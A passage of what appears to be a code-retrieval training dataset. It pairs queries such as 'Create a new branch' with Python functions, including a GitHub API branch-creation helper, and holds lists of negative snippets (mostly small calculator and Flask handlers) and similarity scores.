).pack()\n \n # seven \n num7 = tk.Frame(\n master=calcarea\n )\n num7.grid(row = 1, column = 0)\n num7b = tk.Button(\n master = num7,\n text = \"7\",\n width = 5,\n height = 2,\n command = lambda: add(\"7\")\n ).pack()\n \n # eight \n num8 = tk.Frame(\n master=calcarea\n )\n num8.grid(row = 1, column = 1)\n num8b = tk.Button(\n master = num8,\n text = \"8\",\n width = 5,\n height = 2,\n command = lambda: add(\"8\")\n ).pack()\n \n # nine \n num9 = tk.Frame(\n master=calcarea\n )\n num9.grid(row = 1, column = 2)\n num9b = tk.Button(\n master = num9,\n text = \"9\",\n width = 5,\n height = 2,\n command = lambda: add(\"9\")\n ).pack()\n \n # zero\n num0 = tk.Frame(\n master = calcarea\n )\n num0.grid(row = 4, column = 0)\n num0b = tk.Button(\n master = num0,\n text = 0,\n width = 5,\n height = 2,\n command = lambda: add(\"0\")\n ).pack()\n \n # period\n dot = tk.Frame(\n master = calcarea\n )\n dot.grid(row = 4, column = 1)\n dotb = tk.Button(\n master = dot,\n text = \".\",\n width = 5,\n height = 2,\n command = lambda: add(\".\")\n ).pack()\n \n # equal sign\n eq = tk.Frame(\n master = calcarea\n )\n eq.grid(row = 4, column = 2, columnspan = 2)\n eqb = tk.Button(\n master = eq,\n text = \"=\",\n width = 11,\n height = 2,\n command = equals\n ).pack()\n \n # plus sign\n plus = tk.Frame(\n master = calcarea\n )\n plus.grid(row = 3, column = 4, rowspan = 2)\n plusb = tk.Button(\n master = plus,\n text = \"+\",\n width = 5,\n height = 5,\n command = lambda: add(\"+\")\n ).pack()\n \n # minus sign\n minu = tk.Frame(\n master = calcarea\n )\n minu.grid(row = 3, column = 3)\n minub = tk.Button(\n master = minu,\n text = \"-\",\n width = 5,\n height = 2,\n command = lambda: add(\"-\")\n ).pack()\n \n # multiplication\n mult = tk.Frame(\n master = calcarea\n )\n mult.grid(row = 2, column = 3)\n multb = tk.Button(\n master = mult,\n text = \"*\",\n width = 5,\n height = 2,\n command = lambda: add(\"*\")\n ).pack()\n \n # division\n div = tk.Frame(\n master = calcarea\n )\n div.grid(row = 2, column = 4)\n divb = tk.Button(\n master = div,\n text = \"/\",\n width = 5,\n height = 2,\n command = lambda: add(\"/\")\n ).pack()\n \n # left parentheses\n lefp = tk.Frame(\n master = calcarea\n )\n lefp.grid(row = 1, column = 3)\n lefpb = tk.Button(\n master = lefp,\n text = \"(\",\n width = 5,\n height = 2,\n command = lambda: add(\"(\")\n ).pack()\n \n # right paraentheses\n rigp = tk.Frame(\n master = calcarea\n )\n rigp.grid(row = 1, column = 4)\n rigpb = tk.Button(\n master = rigp,\n text = \")\",\n width = 5,\n height = 2,\n command = lambda: add(\")\")\n ).pack()\n \n # Clear button\n Clr = tk.Frame(\n master = calcarea\n )\n Clr.grid(row = 0, column = 3)\n Clrb = tk.Button(\n master = Clr,\n text = \"C\",\n width = 5,\n height = 2,\n command = clear\n ).pack()\n \n # backspace\n bck = tk.Frame(\n master = calcarea\n )\n bck.grid(row = 0, column = 4)\n bckb = tk.Button(\n master = bck,\n text = \"\\N{RIGHTWARDS BLACK ARROW}\",\n width = 5,\n height = 2,\n command = backspace\n ).pack()\n \n # This is what kicks the whole thing off, lets it wait for commands.\n calc.mainloop()", "def execbox(response, url=\"/exec/\"):\n response.out.write(\"\"\"\n <form action=\"\" method=\"GET\">\n <b>enter command:</b><input type=\"commit\" name=\"input\" value=\"\">\n // <input type=\"button\" value=\"go\" onClick=\"makePOSTRequest(this.form)\"\n </form>\n \"\"\")", "def _send_request(self):\n route_chosen = self.comboBox_route_list.currentText()\n route_id = route_chosen.split(',')[0] #to get the id of the route\n trip_headsign_chosen = self.comboBox_trip_headsign_list.currentText()\n stop_chosen = self.comboBox_stop_list.currentText()\n self.request(route_id, trip_headsign_chosen, stop_chosen)", "def commandbox(response, url=\"/dispatch/\"):\n response.out.write(\"\"\"\n <form action=\"%s\" method=\"post\">\n <div><b>enter command:</b> <input type=\"commit\" name=\"content\"></div>\n </form>\n \"\"\" % url)", "def main():\n\texpression = input(\"Enter expression \")\n\tans = calculate(expression)\n\n\tprint(ans)", "def all_numeric_accumulations(request):\n return request.param", "def home():\r\n if request.method == \"POST\":\r\n num = request.form[\"number\"]\r\n if not str.isdigit(num) or int(num) <= 0:\r\n flash(\"Please input a positive integer.\")\r\n return redirect(request.url)\r\n return redirect(url_for(\"table\", num=num))\r\n else:\r\n return render_template(\"fetch.html\")", "def main():\n CalculatorApp().mainloop()", "def all_numeric_reductions(request):\n return request.param", "def all_numeric_reductions(request: Any) -> Any:\n return request.param", "def all_numeric_reductions(request: Any) -> Any:\n return request.param", "def corr(request):\n return request.param", "def index():\n if 'number' in request.form:\n phone_numbers.append(request.form['number'])\n return \"Cool Thanks!!!!\"\n else:\n return render_template('roulette.html', number=HOTLINE_NUMBER)", "async def request(self, multiplier: Optional[int]=None):\n # TODO: validate the multiplier\n message = Message(self.name_path, multiplier)\n await self.issue_command(Command(message))", "def operatorCommand(self, buttonText):\n def applyOperator():\n number = self.digits[\"text\"]\n if number == 'Error':\n return\n if \".\" in number:\n number = float(number)\n else:\n number = int(number)\n self.calculator.applyOperator(buttonText, number)\n self.digits[\"text\"] = str(self.calculator)\n self.operatorEntered = True\n return applyOperator", "def render(self, h, comp, *args):\n r = var.Var()\n\n return h.form(\n self.msg, ' ',\n h.input.action(r),\n h.input(type='submit', value='Send').action(self.answer, comp, r)\n )", "def calculator(**pars):\n # paying for parameter conversion each time to keep life simple, if not fast\n pars = revert_pars(model_info, pars)\n for k, v in pars.items():\n parts = k.split('.') # polydispersity components\n if len(parts) == 2:\n model.dispersion[parts[0]][parts[1]] = v\n else:\n model.setParam(k, v)\n return theory()", "def simple_calculator(calculation):\n\n\n operations = {'+': lambda x,y: x + y,'-': lambda x,y: x-y,'*': lambda x,y: x * y,'/': lambda x,y: x/y}\n \n def is_numeric(x):\n\n try:\n float(x)\n int(x)\n except:\n return False\n else:\n return True\n \n\n values = calculation.split()\n print(values)\n if is_numeric(values[0]) and is_numeric(values[2]) and values[1] in operations:\n operation = operations[values[1]]\n try:\n return operation(float(values[0]),float(values[2]))\n except ZeroDivisionError:\n raise ValueError(\"Division by zero\")\n\n\n raise ValueError(\"Invalid Operation\")", "def web_add():\n a = int(request.args.get('a'))\n b = int(request.args.get('b'))\n return str(add(a,b))", "def handle(req):\n return logic(req)", "def welcome_func():\n\n print('Welcome to Calculator')\n operation_func()", "def call_calculator(args=None, stdout=False):\r\n\r\n parser = create_parser()\r\n\r\n if args is None:\r\n args = parser.parse_args()\r\n\r\n # print(vars(args))\r\n\r\n # taking the first operation in args namespace\r\n # if combo, e.g. -a and -s, take the first one\r\n for operation, numbers in vars(args).items():\r\n\r\n if numbers is None:\r\n continue\r\n\r\n # print(operation, numbers)\r\n # print(type(operation), type(numbers))\r\n\r\n try:\r\n num_list = [float(i) for i in list(numbers)]\r\n\r\n except:\r\n raise InvalidArgType(\"arg list to be operated on should only have numbers \")\r\n\r\n try:\r\n res = calculator(operation, num_list)\r\n\r\n except ZeroDivisionError:\r\n res = 0\r\n\r\n if stdout:\r\n print(res)\r\n\r\n return res", "def operation_func():\n\n operation_input = input(\"\\nPlease type in the math operation you would like to complete:\\n+ for addition\\n- for subtraction\\n* for multiplication\\n/ for division : \")\n operation_list = [\"+\", \"-\", \"*\", \"/\"]\n if not operation_input in operation_list: \n print('\\nYou have not typed a valid operator!!! \\nPlease enter the math operation again.')\n operation_func()\n\n return calculate_func(operation_input)", "def show_calculations(self):\n self.view.set_sum(self.model.get_sum())\n self.view.set_diff(self.model.get_diff())", "def get_input():\r\n operation = input()\r\n\r\n return operation", "def task_calc():\n return 'What is the result of the expression?'", "def process_menu_page(self):\r\n self.print_options(self.menu,1)\r\n\r\n \"\"\"\r\n Asks for user input. Then redirects to the appropriate function.\r\n \"\"\"\r\n n = (input(\"What would you like to do? Please input the correpsonding integer:\"))\r\n\r\n if n == str(1):\r\n self.file_import()\r\n elif n == str(2):\r\n self.view_data()\r\n elif n == str(3):\r\n self.analysis()\r\n elif n == str(4):\r\n self.save()\r\n elif n == str('q'):\r\n quit()\r\n else:\r\n raise InputError(\"Please input a valid digit or 'q'\")", "def index():\n if request.method == 'GET':\n\n\n return render_template('index.html')\n \n if request.method == 'POST':\n\n message = request.form['text']\n data_vector = text_vector.transform([message])\n data_transform = text_transformer.transform(data_vector)\n prediction = lsvc_model.predict(data_transform)\n # output_prediction = lsvc_model.predict(data_transform)\n \n # return render_template('result.html', output_prediction = prediction)\n return render_template('index.html', output_prediction = prediction)", "def addition():\r\n error_handler()\r\n f1.delete(0, END)\r\n a1 = float(operand.get())\r\n a2 = float(operator.get())\r\n result = a1 + a2\r\n f1.insert(10, str(result))", "def calculator():\r\n print(logo)\r\n num1 = float(input(\"Enter your first number: \"))\r\n for operand in calc_operand:\r\n print(operand)\r\n\r\n user_continue = False\r\n while not user_continue:\r\n calc_operation = input(\"Enter the operation: \")\r\n num2 = float(input(\"Enter your next number: \"))\r\n call_func = calc_operand[calc_operation]\r\n answer = call_func(num1, num2)\r\n print(f\"{num1} {calc_operation} {num2} = {answer}\")\r\n user_selection = input(\r\n f\"Type 'y' to continue calculation with {answer} or 'n' to start new one: \")\r\n\r\n if user_selection == \"y\":\r\n num1 = answer\r\n elif user_selection == \"n\":\r\n user_continue = True\r\n calculator()\r\n else:\r\n print(\"Invalid option. Please select valid input\")\r\n calculator()", "def _route(self, request, url):\n operationIndex = url[:-1].rfind('/')\n processorPath = url[:operationIndex]\n processor = self.api_processor_map.get(processorPath.lower()) \n operation = url[operationIndex+1:].rstrip('/').lower()\n \n http_methods, is_admin, is_cron = self.api_const.get_api_operation_perms(operation)\n \n if is_cron and users.get_current_user() is not None and not users.is_current_user_admin() :\n raise self.api_error.ApiError(self.api_error.API_ERROR_ADMIN_OPERATION, operation)\n \n if is_admin and not is_cron and not users.is_current_user_admin():\n raise self.api_error.ApiError(self.api_error.API_ERROR_ADMIN_OPERATION, operation)\n \n if request.method not in http_methods:\n raise self.api_error.ApiError(self.api_error.API_ERROR_INVALID_HTTP_METHOD, request.method, operation)\n \n if is_cron :\n context.get_context().set_login_required(False)\n \n return self._process(request, processor(), operation)", "def main():\r\n eq = input(\"Input an equation: \")\r\n splitList = (mysplit(eq))\r\n operandsList = []\r\n #This loop takes in the split list and adds to a list without operators\r\n for operand in splitList:\r\n if operand == '+' or operand == '-' or operand == '*' or operand == '/':\r\n continue\r\n operandsList.append(operand)\r\n operatorsList = []\r\n #This loop takes in the split list and adds to a list without digits\r\n for operator in splitList:\r\n if operator.isdigit() is True:\r\n continue\r\n operatorsList.append(operator)\r\n #variable to check if the operator is allowed\r\n operatorChecker = False\r\n for sign in operatorsList:\r\n if sign == '+' or sign == '-' or sign == '/' or sign == '*':\r\n operatorChecker = True\r\n else:\r\n operatorChecker = False\r\n operandsDigits = ''.join(operandsList)\r\n #this checks if the operands are digits\r\n operandsChecker = str.isdigit(operandsDigits)\r\n #check if equation contains division with 0\r\n if '/ 0' in eq:\r\n zeroChecker = False\r\n else:\r\n zeroChecker = True\r\n\r\n #if conditions for the\r\n if operandsChecker is False or operatorChecker is False or zeroChecker is False:\r\n print(\"Invalid Input\")\r\n else:\r\n stack, queue = parseNumbers(eq)\r\n stackAnswer = calculateStack(stack)\r\n queueAnswer = calculateQueue(queue)\r\n print(\"Queue total:\", queueAnswer)\r\n print(\"Stack total:\", stackAnswer)\r\n if queueAnswer == stackAnswer:\r\n print(\"They do match!\")\r\n else:\r\n print(\"They do not match!\")", "def calculate(operandOne, operandTwo, operation):\r\n if operation == '+':\r\n return operandOne + operandTwo\r\n elif operation == '-':\r\n return operandOne - operandTwo\r\n elif operation == '*':\r\n return operandOne * operandTwo\r\n elif operation == '/':\r\n return operandOne // operandTwo", "def calculate_expression(number1, number2, operator):\n\n if operator == '+':\n return number1 + number2\n elif operator == '-':\n return number1 - number2\n elif operator == '*':\n return number1 * number2", "def run():\n reset_calc()\n finish = False\n printCurrent()\n while not finish:\n printMenu()\n\n m = input().strip()\n if (m == 'x'):\n finish = True\n elif (m == '+'):\n m = input(\"Give nominator:\")\n n = input(\"Give denominator:\")\n try:\n calc_add (int(m), int(n))\n printCurrent()\n except ValueError:\n print (\"Enter integers for m, n, with not null n\")\n elif (m=='c'):\n reset_calc()\n printCurrent()\n elif (m=='u'):\n undo()\n printCurrent()\n else:\n print (\"Invalid command\")\n\n print (\"By!!!\")", "def directions_calc(self):\n \n # create route_dict, {'radio_button_name': {'geometries': list of coords,\n # 'values': list of values}}\n route_dict = self._selectInput()\n \n # generate lists with locations and values\n (start_layer_name,\n end_layer_name) = [x.objectName() for x in self.radio_buttons]\n \n locations_list = list(product(route_dict[start_layer_name]['geometries'],\n route_dict[end_layer_name]['geometries']))\n values_list = list(product(route_dict[start_layer_name]['values'],\n route_dict[end_layer_name]['values']))\n \n # If row-by-row in two-layer mode, then only zip the locations\n if all([button.isChecked() for button in self.radio_buttons]) and self.dlg.routing_twolayer_rowbyrow.isChecked():\n locations_list = list(zip(route_dict[start_layer_name]['geometries'],\n route_dict[end_layer_name]['geometries']))\n\n values_list = list(zip(route_dict[start_layer_name]['values'],\n route_dict[end_layer_name]['values']))\n\n # Add via point if specified\n route_via = None\n if self.dlg.routing_via_label.text() != 'Long,Lat':\n route_via = [float(x) for x in self.dlg.routing_via_label.text().split(\",\")]\n \n message_bar, progress_widget = progressbar.pushProgressBar(self.iface)\n \n responses = []\n delete_values = []\n for i, coords_tuple in enumerate(locations_list):\n if coords_tuple[0] == coords_tuple[-1]:\n # Skip when same location\n delete_values.append(i)\n continue\n if route_via:\n # add via coords\n coords_tuple = list(coords_tuple)\n coords_tuple.insert(1, route_via)\n \n # Update progress bar\n percent = (i/len(locations_list)) * 100\n message_bar.setValue(percent)\n \n # Make the request\n self.params['coordinates'] = convert.build_coords(coords_tuple)\n responses.append(self.client.request(self.url, self.params))\n \n # Delete entries in values_list where coords where the same\n values_list = [value for idx, value in enumerate(values_list) if idx not in delete_values]\n \n # Only proceed when there actual responses\n if responses: \n layer_out = self._addLine(responses, values_list)\n layer_out.updateExtents()\n \n QgsProject.instance().addMapLayer(layer_out)\n \n self.iface.messageBar().popWidget(progress_widget)", "def preview_formcalc(self, get):\r\n\r\n result = {'preview': '',\r\n 'error': ''}\r\n\r\n try:\r\n formula = get['formula']\r\n except KeyError:\r\n result['error'] = \"No formula specified.\"\r\n return result\r\n\r\n result['request_start'] = int(get.get('request_start', 0))\r\n\r\n try:\r\n # TODO add references to valid variables and functions\r\n # At some point, we might want to mark invalid variables as red\r\n # or something, and this is where we would need to pass those in.\r\n result['preview'] = latex_preview(formula)\r\n except pyparsing.ParseException as err:\r\n result['error'] = \"Sorry, couldn't parse formula\"\r\n result['formula'] = formula\r\n except Exception:\r\n # this is unexpected, so log\r\n log.warning(\r\n \"Error while previewing formula\", exc_info=True\r\n )\r\n result['error'] = \"Error while rendering preview\"\r\n\r\n return result", "def pressed_op(self, event: Button.Pressed) -> None:\n self.right = Decimal(self.value or \"0\")\n self._do_math()\n assert event.button.id is not None\n self.operator = event.button.id", "def cpt_calc():\n\n if request.method == \"POST\":\n testmin = float(request.form.get(\"techTestMin\"))\n scoremin = float(request.form.get(\"techScoreMin\"))\n computerTestCheckBox = request.form.get(\"computer-test-checkbox\")\n\n # If the \"Computer Testing\" prompt is selected, indicate as such\n if computerTestCheckBox:\n compCheckBox = \"✓\"\n else:\n compCheckBox = \"\"\n\n testhr = testmin / 60\n scorehr = scoremin / 60\n totalmin = testmin + scoremin\n totalhr = totalmin / 60\n\n # Calculate time for 96138 (\"eight\") and work towards calculating 96139 (\"nine\")\n eight_min = 30\n remaining = totalmin - 30\n\n # Calcuate the technician's remaining time divided by 30 to determine whether the person meets the cutoff for >50% of unit 96138\n remaining_30 = remaining / 30\n\n # Round the whole number down\n remaining_floor = math.floor(remaining_30)\n fractional, whole = math.modf(remaining_30)\n\n # Cutoff is set at 16 out of 30 minutes\n cutoff = 0.53\n\n # Add an extra unit to 96139 if user input meets the cutoff\n if fractional >= cutoff:\n extra = 1\n else:\n extra = 0\n\n if eight_min == 30:\n eight = 1\n\n nine = remaining_floor + extra\n\n return render_template('/index.html', techTestMin=testmin, techScoreMin=scoremin, techTestHr=round(testhr, 2),\n testScoreHr=round(scorehr, 2),techTotalHr=round(totalhr, 2), techTotalMin=round(totalmin, 2),\n eight=eight, nine=nine, neurCheckBox=compCheckBox)\n else:\n return render_template(\"index.html\")", "def run(request):\n print(\"This is the run() method\")\n \n #load str\n payload = json.loads(request)\n \n return f\"/n Returning the input for testing: {payload}\"", "def request_input(self, possibles=[]):\n answer = self.console.input('Type your request here:')\n if len(possibles) > 0 and self.numeric:\n invalid = True\n while invalid:\n try:\n answer = int(answer)\n invalid = False\n break\n except:\n answer = self.console.input('Type your request here (numbers only):')\n\n answer = possibles[answer - 1]\n else:\n if answer.find('quit') != -1:\n self.running = False\n else:\n if answer.find('quit') != -1:\n self.running = False\n return answer", "def home():\n\n form = SubmissionForm(request.form)\n\n # Form has been submitted\n if request.method == 'POST' and form.validate():\n\n # Plug in the data into a dictionary object \n # - data from the input form\n # - text data must be converted to lowercase\n data = {\n \"Inputs\": {\n \"input1\": {\n \"ColumnNames\": [\n \"Open\",\n \"High\",\n \"Low\",\n \"Close\",\n \"Volume\",\n \"T3_Vol_Diff\",\n \"T3_Close_Diff\",\n \"T3_Open_Diff\",\n \"T2_Vol_Diff\",\n \"T2_Close_Diff\",\n \"T2_Open_Diff\",\n \"T1_Vol_Diff\",\n \"T1_Close_Diff\",\n \"T1_Open_Diff\",\n \"Prior_Day_Vert_Delta_Ratio\",\n \"Retracement_Signal\",\n \"Prior_Day_Derivative\",\n \"T+1_Close\",\n ],\n \"Values\": [\n [\n form.Open.data,\n form.High.data,\n form.Low.data,\n form.Close.data,\n form.Volume.data,\n form.T3_Vol_Diff.data,\n form.T3_Close_Diff.data,\n form.T3_Open_Diff.data,\n form.T2_Vol_Diff.data,\n form.T2_Close_Diff.data,\n form.T2_Open_Diff.data,\n form.T1_Vol_Diff.data,\n form.T1_Close_Diff.data,\n form.T1_Open_Diff.data,\n form.Prior_Day_Vert_Delta_Ratio.data,\n form.Retracement_Signal.data,\n form.Prior_Day_Derivative.data,\n \"\"\n ]\n ]\n }\n },\n \"GlobalParameters\": {}\n}\n\n # Serialize the input data into json string\n body = str.encode(json.dumps(data))\n# str.encode\n # Formulate the request\n #req = urllib.request.Request(URL, body, HEADERS)\n req = urllib.request.Request(Bayesian_URL, body, HEADERS)\n\n # Send this request to the AML service and render the results on page\n try:\n # response = requests.post(URL, headers=HEADERS, data=body)\n response = urllib.request.urlopen(req)\n #print(response)\n respdata = response.read()\n result = json.loads(str(respdata, 'utf-8'))\n result = do_something_pretty(result)\n # result = json.dumps(result, indent=4, sort_keys=True)\n return render_template(\n 'result.html',\n title=\"This is the result from AzureML running our example T+1 Prediction:\",\n result=result)\n\n # An HTTP error\n except urllib.error.HTTPError as err:\n result=\"The request failed with status code: \" + str(err.code)\n return render_template(\n 'result.html',\n title='There was an error',\n result=result)\n #print(err)\n\n # Just serve up the input form\n return render_template(\n 'form.html',\n form=form,\n title='Run App',\n year=datetime.now().year,\n message='Demonstrating a website using Azure ML Api')", "def runOperation(operation, num1, num2):\n if operation == 1 or operation == '+':\n print(add(num1, num2))\n elif operation == 2 or operation == '-':\n print(sub(num1, num2))\n elif operation == 3 or operation == '*':\n print(mul(num1, num2))\n elif operation == 4 or operation == '/':\n print(div(num1, num2))\n else:\n print(\"I don't understand\")", "def eval(self, string):\n tokens = string.split()\n op1 = int(tokens.pop(0))\n operator = tokens.pop(0)\n op2 = int(tokens.pop(0))\n if operator == '+':\n return op1 + op2\n elif operator == '-':\n return op1 - op2\n elif operator == '*':\n return op1 * op2\n elif operator == '/':\n return op1 * op2\n else:\n raise CalculatorException(\"Unknown operator %s\" % operator)", "def handle_calculate(self, text_input):\n self.output_text = f'{float(self.get_valid_value(text_input)) * MILE_TO_KM_FACTOR:.3f}'", "def execute():\n # print('Wow')\n result = gui.controller.main('execute')\n print(result)\n\n return render_template('results.html', data=json.dumps(result))", "def all_compare_operators(request):\n return request.param", "def dispatch(self):\t\n\n\t\tinput = []\n\t\tfor option_tuple in self.options.__dict__.items(): #build list of input for route reconciliation\n\t\t\tif option_tuple[1]:\n\t\t\t\tinput.append(option_tuple[0])\n\t\ttry:\n\t\t\tcontroller_results = self.callables[self.__conventionalizeParams(input)].__call__()\n\n\t\texcept KeyError:\n\t\t\traise Exception(\"Undefined route given params, %s\" % self.__conventionalizeParams(input))\n\n\t\t\n\t\tif type(controller_results) is tuple: #TODO make decorator pass in view name, instead of a default\n\t\t\treturn ViewBase(controller_results[1]).flush()\n\t\telif type(controller_results) is list:\n\t\t\treturn RawView(controller_results).flush()\n\t\telse:\n\t\t\traise Exception(\"Unsupported controller result type: %s\" % str(type(controller_results)))", "def evaluate(self):\n self.getInput()\n try:\n self.result = eval(self.userInput)\n except ZeroDivisionError:\n self.entry.delete(0, END)\n self.entry.insert(0, \"Not a number\")\n except SyntaxError:\n self.entry.delete(0, END)\n self.entry.insert(0, \"Input error\")\n else:\n self.entry.delete(0, END)\n self.entry.insert(0, self.result)", "def interface(request):\n return request.param", "def home(request):\n assert isinstance(request, HttpRequest)\n if request.method == 'POST':\n form = ExecuteForm(request.POST)\n if form.is_valid():\n param_values = form.param_values()\n active_requirements = retrieve_governance_processes.get_active_requirements(param_values)\n req_items = retrieve_governance_processes.get_requirement_items(active_requirements)\n \n tb = governance_tree_builder.GovernanceTreeBuilder()\n tree_string = tb.pretty_print_items_support([i.id for i in req_items[\"condition_items\"]])\n return render(\n request,\n 'app/index.html',\n {\n 'title':'Result',\n \"tree_string\": tree_string\n }\n )\n else:\n form = ExecuteForm()\n\n return render(\n request,\n 'app/index.html',\n {\n 'title':'Home',\n \"execute_form\": form\n }\n )", "def getcmd(self):\n n_step = self.params['n_step']\n self.params['mode'] = \"normal\"\n line = raw_input(\"the filter mode: <normal/greedy> [default: normal] \\n > \")\n if line.strip() != \"\":\n self.params['model'] = line.strip()\n \n line = raw_input(\"conditions (maybe integer or float) [default: 1.0] \\n > \")\n mystring = line.strip()\n if mystring == \"\":\n self.params['ratio0'] = 1.0\n self.params['n_step0'] = n_step\n elif \".\" in mystring:\n self.params['ratio0'] = float(mystring)\n self.params['n_step0'] = int(n_step * float(mystring))\n else:\n self.params['n_step0'] = int(mystring)\n if self.params['n_step0'] > n_step:\n print \"invalid value...\"\n exit(1)\n \n return", "def multiplication():\r\n error_handler()\r\n f1.delete(0, END)\r\n m1 = float(operand.get())\r\n m2 = float(operator.get())\r\n result = m1 * m2\r\n f1.insert(10, str(result))", "def subtraction():\r\n error_handler()\r\n f1.delete(0, END)\r\n s1 = float(operand.get())\r\n s2 = float(operator.get())\r\n result = s1 - s2\r\n f1.insert(10, str(result))", "def operands(app):\n return cdr(app)", "def route(self):\n pass", "def index():\r\n message = ''\r\n if request.method == 'POST':\r\n inputs = request.form.get('n').split(\",\")\r\n int_input = list(map(int,inputs))\r\n result = \",\".join(list(map(str,bubble_sort(int_input))))\r\n message = result\r\n return render_template('index.html',message=message)", "def solving(num1, num2, opt):\n res = 0\n if opt == '*':\n res = num1 * num2\n elif opt == '/':\n try:\n res = num1 / num2\n except ZeroDivisionError:\n res = 0\n elif opt == '+':\n res = num1 + num2\n elif opt == '-':\n res = num1 - num2\n return abs(res)", "def index():\n\n # User reached route via GET (as by clicking a link or via redirect)\n if request.method == \"GET\":\n\n # FORM TABLE total SELECT name for lookup(name) of now price, price, total costmoney ,totalshares\n portf = db.execute(\"SELECT name, symbol, price, sharesTotal, costmoneyTotal FROM total WHERE userID = :userID\", userID=session[\"user_id\"])\n\n # Len of portf list, rows\n porLen = len(portf)\n\n # For loop portf index \"nowPrice\" to new dict, costmoneyTotal\n for item in range(porLen):\n e = portf[item][\"symbol\"]\n nowPrice = lookup(e).get(\"price\")\n portf[item]['nowPrice'] = nowPrice\n portf[item]['costmoneyTotal'] = usd(portf[item]['costmoneyTotal'])\n\n # List reversed\n portf = list(reversed(portf))\n\n\n # FORM TABLE users SELECT end cash\n endPrice = db.execute(\"SELECT cash FROM users WHERE id = :userID\", userID=session[\"user_id\"])\n\n endPrice = usd(endPrice[0][\"cash\"])\n return render_template(\"index.html\", portf=portf, endPrice = endPrice, porLen=porLen)", "def main():\r\n # Get chosen operation from the user.\r\n action = input('Select \"(1-TS) tcpsend\", or \"(2-TR) tcpreceive\":')\r\n # Execute the chosen operation.\r\n if action in ['1', 'TS', 'ts', 'tcpsend']:\r\n tcp_send(OTHER_HOST, TCP_PORT)\r\n elif action in ['2', 'TR', 'tr', 'tcpreceive']:\r\n tcp_receive(TCP_PORT)\r\n else:\r\n print('Unknown action: \"{0}\"'.format(action))", "def main():\r\n # Get chosen operation from the user.\r\n action = input('Select \"(1-TS) tcpsend\", or \"(2-TR) tcpreceive\":')\r\n # Execute the chosen operation.\r\n if action in ['1', 'TS', 'ts', 'tcpsend']:\r\n tcp_send(OTHER_HOST, TCP_PORT)\r\n elif action in ['2', 'TR', 'tr', 'tcpreceive']:\r\n tcp_receive(TCP_PORT)\r\n else:\r\n print('Unknown action: \"{0}\"'.format(action))", "def all_compare_operators(request: Any) -> Any:\n return request.param" ]
[ "0.6870682", "0.62640357", "0.62640357", "0.6200235", "0.60145706", "0.6007947", "0.5992822", "0.59635174", "0.5928874", "0.58482105", "0.58049804", "0.5771265", "0.5717723", "0.56060153", "0.5605487", "0.5560057", "0.55397177", "0.5519091", "0.54609567", "0.5438152", "0.5435091", "0.54101866", "0.53456396", "0.53453314", "0.5325303", "0.52900976", "0.5283863", "0.5276989", "0.52728236", "0.5272486", "0.5257471", "0.52550673", "0.52461827", "0.52253425", "0.52221024", "0.5210351", "0.5203189", "0.5198857", "0.5192873", "0.5186485", "0.51782066", "0.5139056", "0.5133442", "0.51311666", "0.51151824", "0.5068751", "0.50680894", "0.5055706", "0.5055706", "0.50536877", "0.5051493", "0.50389737", "0.5023377", "0.500207", "0.49959722", "0.49931437", "0.4992032", "0.49917138", "0.4980804", "0.49797615", "0.49649656", "0.4950696", "0.49381483", "0.4918651", "0.49159056", "0.49001515", "0.48919818", "0.48855147", "0.4883687", "0.48713142", "0.48690385", "0.48638672", "0.48549414", "0.48548827", "0.48476812", "0.4847256", "0.48464158", "0.48450333", "0.48430282", "0.4839662", "0.48344165", "0.48061833", "0.48060712", "0.4802666", "0.48025596", "0.48002458", "0.47922385", "0.47918716", "0.47918123", "0.4791457", "0.47852948", "0.47849858", "0.47783563", "0.47764012", "0.4771321", "0.47639346", "0.47579837", "0.47540814", "0.47540814", "0.47536626" ]
0.5568533
15
Create a new branch.
def create_branch(self, name, base_name, from_sha=False): logger.debug( 'GitHubAPI.create_branch: name={}, base_name={}'.format( name, base_name ) ) # raise an error if we can find the branch, continue if we get # a 404 try: self.get_branch(name) except requests.exceptions.HTTPError: pass else: raise DuplicateBranchError( 'Branch already started. Run' '\n\tgit fetch --all && get checkout {}'.format(name) ) if not from_sha: base = self.get_branch(base_name) base_sha = base['object']['sha'] else: base_sha = base_name try: branch_info = { 'ref': 'refs/heads/{}'.format(name), 'sha': base_sha } except KeyError: logger.error('base repsonse: {}'.format(base)) raise Exception( 'Could not locate the current SHA for '.format(base_name)) resp = self.post('git/refs', json=branch_info) try: resp.raise_for_status() except Exception: logger.error(resp.json()) raise return resp.json()
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def create_branch(self):\n os.chdir(str(self.repository_path))\n sh.git.checkout('master')\n sh.git.checkout('-b', self.branch)\n logger.debug('Branch {} created', self.branch)", "def create_branch(ctx, name, sha):\n\n try:\n\n gh = ctx.obj.github\n\n log.echo('Creating branch...', break_line=False)\n branch = gh.create_branch(name=name, sha=sha)\n log.checkmark()\n log.echo('Branch {} created at {}'.format(name, sha))\n return branch\n except BaseException as _:\n log.xmark()\n raise", "def main(github_token, branch_name, repository, sha):\n create_branch(github_token, branch_name, repository, sha)\n click.echo(f\"Successfully created branch {branch_name}\")", "def test_heads_create_new_branch_name(repository: Repository) -> None:\n branch = repository.heads.create(\"branch\", repository.head.commit)\n assert \"branch\" == branch.name", "def branch_new(request, repo_id):\n repo = models.Repository.get_by_id(int(repo_id))\n if request.method != 'POST':\n form = BranchForm(initial={'url': repo.url,\n 'category': 'branch',\n })\n return respond(request, 'branch_new.html', {'form': form, 'repo': repo})\n form = BranchForm(request.POST)\n errors = form.errors\n if not errors:\n try:\n branch = models.Branch(\n repo_key=repo.key,\n category=form.cleaned_data.get('category'),\n name=form.cleaned_data.get('name'),\n url=form.cleaned_data.get('url'),\n )\n except (db.BadValueError, ValueError) as err:\n errors['__all__'] = unicode(err)\n if errors:\n return respond(request, 'branch_new.html', {'form': form, 'repo': repo})\n branch.repo_name = repo.name\n branch.put()\n return HttpResponseRedirect(reverse(repos))", "def test_heads_create_new_branch_commit(repository: Repository) -> None:\n branch = repository.heads.create(\"branch\", repository.head.commit)\n assert repository.head.commit == branch.commit", "def create_branch(self, name: str, base_commit: str = None) -> heads.BranchHead:\n self.__verify_repo_initialized()\n if (not is_ascii(name)) or (not is_suitable_user_key(name)):\n err = ValueError(\n f'Branch name provided: {name} invalid. Must contain only alpha-numeric '\n f'or \".\" \"_\" \"-\" ascii characters. And be <= 64 Characters')\n raise err from None\n createdBranch = heads.create_branch(\n branchenv=self._env.branchenv,\n name=name,\n base_commit=base_commit)\n return createdBranch", "def create_branch_from_issue(jira_url, jira_username, jira_api_key, project_key, source_branch_name, issue_key):\n click.echo('Branch \"{}\" was created'.format(\n 